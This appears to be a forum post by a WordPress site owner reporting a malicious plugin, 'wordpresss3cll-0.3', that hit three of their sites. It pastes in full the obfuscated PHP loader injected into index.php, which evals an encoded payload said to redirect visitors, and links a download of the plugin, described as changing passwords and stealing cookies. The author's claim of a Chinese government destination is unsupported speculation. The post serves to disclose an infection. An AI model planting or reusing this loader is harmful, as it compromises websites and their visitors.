today 3 of my websites got hammered by this malware
wordpresss3cll-0.3
the file uploaded to the upload directory somehow ..
and it adds a decoded code to index.php in which redirect your website to a chinese website . using the following code
<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0[3].$O00OO0[6].$O00OO0[33].$O00OO0[30];$O0OO00=$O00OO0[33].$O00OO0[10].$O00OO0[24].$O00OO0[10].$O00OO0[24];$OO0O00=$O0OO00[0].$O00OO0[18].$O00OO0[3].$O0OO00[0].$O0OO00[1].$O00OO0[24];$OO0000=$O00OO0[7].$O00OO0[13];$O00O0O.=$O00OO0[22].$O00OO0[36].$O00OO0[29].$O00OO0[26].$O00OO0[30].$O00OO0[32].$O00OO0[35].$O00OO0[26].$O00OO0[30];eval($O00O0O("JE8wTzAwMD0iaUdmelBFYnJkc2V2aE9Ob1lIWFNqWnVweUtGV2N3a0NMdGFxSW1SZ0RUblVRTVZKeEFCbGtzWHd5TENHRXBSeEtJVmRBUWlvQmVXVXFUSGJTbmh1bERKdGptUGZOTU9jZ1p6YUZ2cll5TjluSlF2ZmFRVlVFc3plRWIxVUNtUzlqT0s0Uk5TMWxPcnhTUVZZQ21nV0FPejZSazhrSXFQMVMyenFpMkhPZWI1MHliWXdTMnowVHVQWGMwem96aHpvYnFFanpIUGdpMXpNUHphWGdjRUhNWWdPaW9oL2FIOU1QemFiUHphQ2EwS2N6SHJYenpWSGNZOXJQMHpJenVFRUlrU09JcVAxU21GcWViZVlTQjBmSmlWd2VpZ2RhSDlNUHphYlB6YUNhMEtjekhyWGNoenNQemFIY2tFRVRNOGhpMVZIY1llSGNZcE9vSFBjY0g5b1BjZUhjaHpvYTEwNmFxUzdhc0VZRVF6cUNOMVVTM1ZZRXVmaGkxVkhjWWVIY1lwT2NoelB6Y3pNekg5emNoaE9pb2gvYUg5TVB6YWJQemFDYTFhSGN6ekhjMVBYenphYWExMDZhcVM3YXNFWUVRenFDdXY5UzNQcWkzYVlTc0ZLQTJjZGprOVVDbVBZUnU1bkpRdi9qa25ramtuaGUyejBFaWFwVE1waEpzOXdFTDVLQ2JjOUppVndlaWdkYUg5TVB6YWJQemFDYTBLY3pIclhvTDlNenVFRVRNOGhpMVZIY1llSGNZcE9vSFBjY0g5ak0xVmNhMTA2YXFTN2FIYVlDYjkwZXo5cmVzUHFlaVZ3eWJZd1MyejBUdVBYYzB6b3poem9icUVvUGMxeXpMelhnY1BMY2tFRVRNOGhpMVZIY1llSGNZcE9jaHpWTTFQSGkwSExQSGpPaU1kT2F3cGhDc0hXZTN6S2UyYzlKaVZ3ZWlnZGFIOU1QemFiUHphQ2poS2N6SHJYZ2NWTlB6cmNpMEZyTWhFemdjRUhqWTBVeXFQWGMwem96aHpvYnFhanpIUGdpMEhOZzB6Z3pIOVpnYzVRemNIUVBvYUVJa1NPSTJZbVRzWXdpMkswRVFyd1R1aFVScVBkRU4wa0pRUDBTUVprSTMxWUNRVllScVBkRU4wa0pRUDBTdWo3WGNZc1RzZVVDc3pYZWlLVVMzUHdUdVBtSmJGWWpOMGZpMTlMb3phWGlxNGtsM2F4QW05MFNxNTBSUWdrVG9ZN2dReldDc1lXSnFmaGVtWXBlb2g3WGNZc1RzZVVDc3pYZWlLVVMzUHdUdVBtSmJGWWpOMGZpMTlMb3phWGlxNGtsM1ZVRXN6REFpdldSczFwamtoVVIwcjFDbUZVQ21wZGFzZVVDc2NVSTMxVWVrS3dFUWFVU3M5d1R1UFhjMHpvemh6b2JxRW9Qekh6UHpWY2kxem9vb0VFbHVFMGVpVjBaTWp3Vk5jMmFxaEt5TTFtQWJGd2VvWTdhUXpxQ04wa0pRUDBTUVo2bHE4a2xrUHdKaVBZYml6REpiNU9sa2EwZWlWMFpNandWTmMyakJwaFNzOXdFSDloQWlQS2pOMGZBaWFxQWloZGp1RWRDM1YwTW1IRGVvU2Z5TTRmYXNLeFMzUElBYjFZbHV2T2UyejBFaWFwYXcwK2FzRVlFUXpxQ3V2VUlxUGRFczFwenM5d0pzOTNqTjBmUzJ6V2VIOW5DM1YwVHVQMVNtbnBhUXJ4UzNQWGVzSDBBb2g3ZWJWZENxdmhKUVBEQ0hQeFMyS3hFcTRrbG8wRHlraldqQmcwVm9qN2VpS1VFTkQ5SmJBZFMzUHFKaXJ4U3FmaGkxVkhjWWVIY1lwT2NoelB6Y3pNekg5emNoaE9pb25PU3NZV2UzVlVFc3pEQWl2T1RvTDl5YmVLQ1FWWVRpcGhFaWFwak4wZmptSzBFUXJ3SWs4eGprNGhTMlkwZXpZMUNiWVdlcTRrU3NZV2UzVlVFc3pEQWl2a0lxUG5DM1YwaTJLWUFiUFlTQjFLU09hS1JvZk9nMjlXRXN6V0V1MWNSaXJZSWtyS1NRcnBKYlZLRXNZeENrOXRTMjlXYXFuVUlxUG5DM1YwaTJQS0VzTGZ5b3JLU09hS1JvZmZhMkt4UzNQSUFiMVlhcXY5eWt2aEpzOXdFTDVLQ2JjZlRNcGhTMlkwZWIxS1NzVnhFYjUwak4wZkEzenFDSDluQzNWMFR1UDFTbW5wYVFyeFMzUFhKc3pLZXN6cWx1UG5DM1YwaTJQS0VzTFVJMmV4U2t2ZGFzaDlaTXBoSk1uOWFRVlVFc3pEQWlyQkMzeldFTnBoSm9wR1RpcGhTc1lXZTN6cUN1djlqdVBkRXV2V2p1ajZscThrbGtQZEMzVjBNbUhEZW80a2x3OXdKaVBZQ2JIbmprNGhKbzRrbE9LREN1ajdhUXJVQ21FMVNtbjlqbUswRVFyd0lrOHhFM0UzbG1FeEMyRXBlbzVCQzIweFNzWVdldzl3SmlQWUNiSG55b2pXYVFyVUNtRTFTbW43YXNWeENPUFlDT1B3ak4wZmUyejBUdVBuSmI1T0VpYXBUTURVZWtLd0VRYW5DM1pkYXNWeENPUFlDT1B3bHV2a2MyWTBlYjFLU3VySUMzUFVlbVlCQWlQVUMyNGZjbXpCZWJZMmViZ2tUb2hmUjJ6QkpzOGZqWVYxQW0xVUVRUFVDbVNmUDI5eGUyRllqSFZVRXN6REFpdmZhUXJVQ21FMVNtbmZJa3J5b3FMOEFPaitqQkQ5ZWJGd2VpRFlBMkt4anVhTUViYURKaVAwSmI1T2pMRXhDMkVwZW9yTUppUFlDYkhuanVQbkpiNU9FaWFwak5kZlB6YW9NMWpLeXNhcXlrajdYaTFZUnNZMEkzMGhBMjlXQ0IwaGkxVkhjWWVIY1lwT2NoelB6Y3pNekg5emNoaE9pTXBoQTI5V0NCMXdFUWFYU216bkNzSEJlb2ZrbHFqcGpranBhc1Z4Q200VUlxUEJDMjVXeWlWMFNZOXFlaXJwQWJWWVR1ai9qa25ramtuaEEyOVdDa2g3YVFlWVNPVlVDMjQ5U1FhWWUxOURBaVBCSnVmT2wxNXdKaVBZQ2JIblRIRmhUcWhXUnMxcGF1OE9sdVBCQzI1V2x1UERBYlZkZWlaVUlxUDJlaWF3SmI5V1pNMW5TbXpPaTIxS0VzVmRUdVN4aU9WVUVzekRBaXZXUnMxcGF1OE9sdVBCQzI1V2x1UERBYlZkZW9oN0piQWZUdVAyZWlhd0piOVdYUW5oRW16cVMyWXhDQkxVUjJLWUFiUFlTa2ZPZzI5V0VzeldFdTEwUmlyWUltSG5Tc0ZVQTJIMEpiOVdsM0tEQ3VTVUlxUGRDM1YwTW1IRGVvdjlqdVBkRXU0ZmpCZHhscWpXYXNLeFMzUElBYjFZSXFQMVNtbmZ5b3ZrSlFQMFNRWjZscThrbGtQd0ppUFliaXpESmI1T2xrYXdKaVBZQ2JIbmpCcGhTczl3RUg5aEFpUEtqTjBmQWlhcUFpaGRqdUVkQzNWME1tSERlb1NmeU00ZmFzS3hTM1BJQWIxWWx1dk9lMnowRWlhcGF3MCthc0VZRVF6cUN1dlVJcVBkRXMxcHpzOXdKczkzak4wZlMyeldlSDluQzNWMFR1UDFTbW5wYVFyeFMzUFhlc0gwQW9oN2ViVmRDcXZoSlFQRENIUHhTMkt4RXdEWVJzWTBUdWg3WG9QMVNtbmZ5b3ZrSlFQMFNRWjZscThranU0ZmFRVlVFc3plRWIxVUNtU2Zsa3ZrZTJ6MEEyOVdFc3pXRXVqN0piQWZUUVYwU21ZbkMzWmRhUXp3ZWlhWEFiRVlDT2dwam1heEV1alVqTTA5ZW1IcFMyY2Zha0FmUzNQcUppcnhTcWZoaTFWSGNZZUhjWXBPY2h6UHpjek16SDl6Y2hoT2lvbk9sT0tEQ3VTVXlNMXNnY0ZNUG9oZlJxUGRDM1YwTW1IRGVvdjlqdVBkRXU0ZmpCZHhscWpXYXNLeFMzUElBYjFZSXFQbkMzVjBpMlBLRXNMZnlvcktTT2FLUm9mZmEyRVlFUXpxQ3VTZnlNNGZhc0VZRVF6cUN1bmZhMkt4UzNQSUFiMVlhcXY5eWt2aEpzOXdFTDVLQ2JjcGp1RXFlYjF4RXN6cmVzUHFlaVZ3YXF2OXlrdmhjbXpEQzNQWWkwSGhlUWFZUzNacGp1RTFTMnpxZ2JFWUNPZ09qTjAranVFa0MzZ09sdXZVSXFQZEVzMXB6czl3SnM5M2pOMGZTMnpXZUg5bkMzVjBUdVAxU21ucGp1UG5DM1YwaTJQS0VzTFVJMnpCSnM4ZmFzSzBDYkZjQzNWZEMzUzdlaUtVRXVmVUkzMVlDUVZZalFwaFNzOXdFSDloQWlQS2pOMGZBaWFxQWloZGp1RTFTbUZxZWJlWVNrU2Z5TTRmYVF6cUNRYVllbXpxbHV2T2UyejBFaWFwYXF2OXlrdmhlMnowRWlhcGx1dk9Kczl3RUw1S0NiY09qTjAranVQZEMzVjBNbUhEZW9uZmEzYVlDYjkwZWNIaGVRYVlTM1pPak4wK2p1UG9lYjF4RXN6WGdiUGhTbXp3U3FuZmEyYXBDM0V3ZWlqT3lNNGhDc0hXZTN6S2UyY3BqdWg3YXNLMENiRmNDM1ZkQzNTZnlvcndlYjVoaTNyeFMzZ2RhUXpxQ3VuZmFRcnhTM1BYZXNIMEFvaDdKYkFmVHVQZEVzMXB6czl3SnM5M2pNMGtqa2hmUjJ6QkpzOGRhd25LUEw5TnpIWWdQb3JkRXMxcHlCRmRFczFweUJGZGViSGh5QkZEZWlQS2pzVmRBaWF3ZWlnOWpPejBlazA0akI0OENiejBBb3JkRVFQbmxiekZFYlkyeW9hcWViZXFlaVZkamtyQkMyNTBlYjUweW9qbkkzenFDTjBPbGtQZEVzMXB6czl3SnM5M2xrU2tqdTgreXU5ZGViSGh5QkZrQzJQNXlCRldDM1ZCU21ZbkVONDhDYnowQW9yZEVRUG5sYnpGRWJZMnlvYXFlYmVxZWlWZGprckJDMjUwZWI1MHlvam5JM3pxQ04wT2xrUGRFczFwenM5d0pzOTNsa1NranU4K3l1OVdDM1ZCU21ZbkVONDhTMlZxSmlyMHltUHhBM3pEZWI1MGxtRnhBMkgwSmI5V2xtS3FlYkFmeW92a2FxNGhKUVBEQ0hQeFMyS3hFcTRPakJueFMyVnFKaXIweUJueEFtOWhSTTQ4bDJLMENibithcWg3ZWlLVUVORDlYYmUxQ21WMEpiOVdqUVZZQ21QWFNzOXdFdWZoRWlhcGx1dmhTczl3RUg5aEFpUEtUb3I3YVFyeFMzUGhBaVBLak4wZkpRUDBTSDlrRWJZcGVIOUZFYnpxUm9maFNzOXdFSDloQWlQS1RNcGhDM3IwSmI5V1Nxdjlqc0hxU21INVR1dk9KUVAwU3VTZnlNNGZBaWFxQWloZGp1RURlaVBkQzJnT2pOMCtqdUVnTTFWY2FxbmZhMktZQWJQWVNrU2Z5TTRmYTBWeENPUFlDT2dERVFZbmVNVUtTUXJwSmJWS0VzWXhDazk0bGlFM0VxMW1DM2FEbGl6cUNzeldBMjloZWJnT2x1dk9BMjlXRXN6V0V1U2Z5TTRmYVFyeFMzUGhBaVBLbHV2T0VzWURlYjkxRXVTZnlNNGZaTWNmVGt2Mlp1dlVqdWg3YXNWeENPUFlSUWdmeW9yd0VRYVlBYjFYQTI5V0VzejRFSDlCU216S0VzY2RhczluRXNZeENPWlVJcVBxZWlWMUNRZ2Z5b3JtSmJGWWkyRVlFSDlCQzI1MGViNTBTcWZoRWlhcGx1cm1BYkZ3ZW9uZmFzVnhDT1BZUlFnVUkzYVlFUXpxQ2t2aFNtendFYkYwSTMxbUViNUJFc1l4Q2tyQkVpYXBpM3J4UzNnZGFRcnhTM1BYRWlhcGx1UGRlYkhoZWlhd2x1UG5DM1YwaTJQS0VzTFVScVBCSnV2OWpzVjFTbUZYSmI1VUV1dmRUTURCRWlhcGkzVllFczluRXVmaEEyZnBqTFZ6Y2hGeWNIUFhjTDlNenV2cGpOTFVJMlYxU21GWFMyejBDM3IwVHVQQkp1bmZnMXpvTUw5Z3pIOXpjaG5mbHV2aFNzOXdFSDkxU21uVUkyVjFTbUZYUzJ6MEMzcjBUdVBCSnVuZmcxem9NTDlnekg5Z00xVmNQaFlITUxQTWp1bmZKT1Z4Q1k5WUNtVnhlc2NkYVFyeFMzUFhlc0gwQW9oVUkyVjFTbUZYUzJ6MEMzcjBUdVBCSnVuZmcxem9NTDlnekg5TWMwRlh6aHpvb2NlZWNMekhja25mZW1IcFMyY1VJMlYxU21GWFMyejBDM3IwVHVQQkp1bmZnMXpvTUw5Z3pIOXNNMEZaTTFFWk0wVnJ6TFl5TWtuZlpvaDdBM3pxQ0g5d2VpUHhTUWdkYXNWZGx1ck56emFaTTFyY2kxYUh6SHpvTVlQb2djNU1QaHpvbHV2RlRNREJFaWFwaTNWWUVzOW5FdWZoQTJmcGpMVnpjaEZ5Y0hQWHpMWVZQYzl6enVud1ZCdm5UTURCRWlhcGkzVllFczluRXVmaEEyZnBnMXpvTUw5Z3pIOWp6SFBnb0x6clBMem9sdVBkZWJIaGVpYXdUTXBoU216d0ViRjBqTjBmQTN6cUNIOVlSc3pCVHVQQkp1aDdBM3pxQ0g5QkNzOXdlb2ZoQTJmVUkzYVlFUXpxQ2t2aFNtendFYkYwSTMxbUViNUJFc1l4Q2tyVVMxOWRFUVBuU3FmVWpRRFVla3ZkanVIWUNpcjBSb2ZoaTFWSGNZZUhjWXBPb0hQY2NIWk9pb2hmYWtBZlMzUHFFczlwQzNFWVNrZmhpMVZIY1llSGNZcE9vSFBjY0haT2lvaGZqTTA5anVFeGVtQU9Ub3I3U216MEVpYVdqUVBxRWJjN1hienBTMnpVZWt2ZGpzWXdTMnowVHVQWGMwem96aHpvYnFFanpIUGdpMUtYUGg5b3owSG9QTHpMaTFyb00xUHlhMTBVanVBbWp1UFhjMHpvemh6b2JxRWp6SFBnaTFLWFBoOW96MEhvUEx6TGkxcm9NMVB5YTEwZnlNMDlqdUVkRVFQblNxU2ZUb3I3U216MEVpYVdqUVBxRWJjN1hienBTMnpVZWt2ZGp1SFlDaXIwUm9maGkxVkhjWWVIY1lwT29IUGNjSDlzY2g5SXpIOUhNaFBYb0hQY2NIWk9pb2hmYWtBZlMzUHFFczlwQzNFWVNrZmhpMVZIY1llSGNZcE9vSFBjY0g5c2NoOUl6SDlITWhQWG9IUGNjSFpPaW9oZmpNMDlqdUV4ZW1BT1RvcjdTbXowRWlhV2pRUHFFYmM3WGlhWUVRenFDa3JtQWJGd2VNRDllT3pXQTNQVUMyNGZlMnowVHVQMVNtblVScVBCQzI1MGViNTBTcXY5akxybUpiRllpMkVZRUg5QkMyNTBlYjUwU3FmaEVpYXBUTURVZWt2ZGpvUEJDMjUwZWI1MFNxaGZScVBCSnV2OWpzVjFTbUZYSmI1VUV1ZlVJMlYxU21GWFMyejBDM3IwVHVQQkp1bmZnMXpvTUw5Z3pIOXpjaG5wanVQMVNtblVJMlYxU21GWFMyejBDM3IwVHVQQkp1bmZnMXpvTUw5Z3pIOW9QelB6Y2g1Y2NoSEljMGVIY2tuRlRNcGhBMjlXRXN6V0VRWmZ5b3JCRWlhcGkyejRlYlpkYXNWZFRNREJFaWFwaTJWcEMzVllUdVBCSnVoN1hpYVlFUXpxQ2t2aEEyOVdFc3pXRVFaN1hNOCsiO2V2YWwoIj8+Ii4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));
?>
the uploaded plugin can be found on the following link ..
i did a quick reading … it contains codes to change passwords and to steal cookies … and direct them to chinese goverment db .
https://drive.google.com/drive/folders/1ztSYjc4aXUNLfcdsxHaLzHbV6-0W30l4?usp=share_link
regarsd